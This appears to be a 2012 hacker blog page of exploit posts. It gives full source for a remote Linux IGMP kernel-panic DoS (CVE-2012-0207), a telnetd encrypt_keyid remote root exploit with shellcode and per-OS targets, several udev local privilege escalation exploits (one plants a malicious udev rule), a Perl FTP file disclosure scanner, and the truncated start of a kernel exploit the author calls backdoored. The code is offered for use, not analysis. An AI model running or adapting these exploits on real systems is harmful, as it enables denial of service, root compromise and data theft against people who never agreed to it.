Help pay for xds lawyer fees.
LR

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
comments: 0 » tags: ,

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ socalled version ;)
XD

comments: 0 » tags: , ,

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

comments: 5 » tags: ,

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jonos code! Yes, when it is neater and, nicer than the alternatives ofcourse, but NOT when theyre crippled :) k thx. So, this is bein posted now, abit late but, better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD

comments: 2 » tags: , ,

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 Ftp Server file disclosure vulnerability script here, for anyone fuzzing with G6….seems to be very Big userbase with windows forsue..
ENJOY!

######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE
/$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

comments: 0 » tags: ,

LINUX 2.6.* Local x86_64 (ONLY) Backdoored AB rip-off code

Posted on 30th September 2011 in Exploits

We face a new low.. from 133day.com , this comes as a ‘new’ 2011 kernel exploit, i looked thru it, it is STILL backdoored like original ABftw.c code, wich will always bind a port, to usually 9999 i believe but, correct me if im wrong, this is a no brainer to see that it is simple…shellcode-hides-stuffs !
AB wont stand for this rubbuish, and theyre backdoor, is NON prtable :P
SO, this is being brought in front, and exposed, for the pathetic ripoff of ac1db1tch3z ,who unlike these jerkwads, actually KNOW theyre stuff.
this code, is not even trying to use a new vector :s it still handles syscalls via int 0×80 ,so, how will this beat a 2010 kernel ?
Anyhow, there is better exploit now for this, and much smaller, with no backdoors, and no mmap() needed. YES it is on this website, if your regged it will appear, unregged do NOT SEE all posts.
i would say, best todo is simply add us to a RSS feed, if anyone wants me to put up info + .tcl file on using eggdrop-with-rss for theyre own mIRC channels etc, just send me some ask in the form of a reply or comment even just pm..and ill be happy to make it, until there is a need then, what is the point.many people do not use tcl, or, dont use eggdrops on theyre linux box, they consider it security risk, but, i guess i use my one, from a registered shell account 9thx guys @ xzibition/Bryan.D in particular for his timeless adminship)
Again, thanks to all my #Haxnet @ EFNet friends ;>
it is now forsure, the best +ps channel ever made i think :P
Anyhow, feel free to show me, what this can do, this new exploit posted only TODAY mind you on 1337day.com, why is this, going to beat a -stab- kernel,and, i hope this aint some grab at a new method of enforcing linux and dummying it, coz, that is old to… I will post a grsec+selinux+chroot breakout, code wich works tho, wich does not need one bit of shellcode..nor shuld this smashing of stack on this, wont work on most boxes simply coz mmap() permission denied is still going to block it… you cannot make codes like this, thats just BS, NOTHING was even noted, and, this is still MCAST_FILTER attack… so, what is diffeent, again i ask… and, oh, btw, if u want to backdoor yourself, sure, go ahead, the cr3d shellcode is really a backdoor, or was it the idt…. :P
have fun.
The real deal, is NOT this crap.. believe in me this.
cheers loyal readers
xd

PS: IT-Undergound is alive and well =) i am glad and hope they can get some site up soon with codes, i posted one of theyre sshd bruter for win32 actually, wich is from roy-def8 ,and he is a top guy!
Greets to anyone i missed, but, pls, try to explain to me what this thing, is gong todo, like, why not try find another vector atleast, rather than 0×80, then we would atleast have a new attack…and those targets, just suck… they can be taken out with a bash script :P
So, please, stop posting rubbish like this, and , concentrate on things like, the recent FreeBSD-REL-STAB bugs in compress and in ipc.. that one, is specially nice, coz it is socket based, and alot like sendmessage.. very easy to code, but ill leave that for someone like kcope, so he can broaden his arsenal ;p hehe, like it isnt big enough!
peace to my ‘homies’ ? OK!

The alleged bad code, and posted as ’0day on 133day.com ROFL!!!!

/*
kernel-2.6.30 2010 Local Root Exploit
====================================================
Author : Th3 L0rd Dilaw [GarA]
Home : Mafia Hack Team & www.Arhack.net
Exploit DataBase: 1337day.com
Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi &
Dr.Milas & O-Snip3r & El Boss Gangster
This Local work also on :
2.6.30 .10 /*/ 2.6.30 .1 /*/ 2.6.30 -rc6 /*/ 2.6.30 -rc5 /*/ 2.6.30 -rc3 /*/ 2.6.30 -rc2 /*/ 2.6.30 -rc1 /*/
====================================================
*/
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
#ifndef __i386__
#error "x86_64 is the targets here.."
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

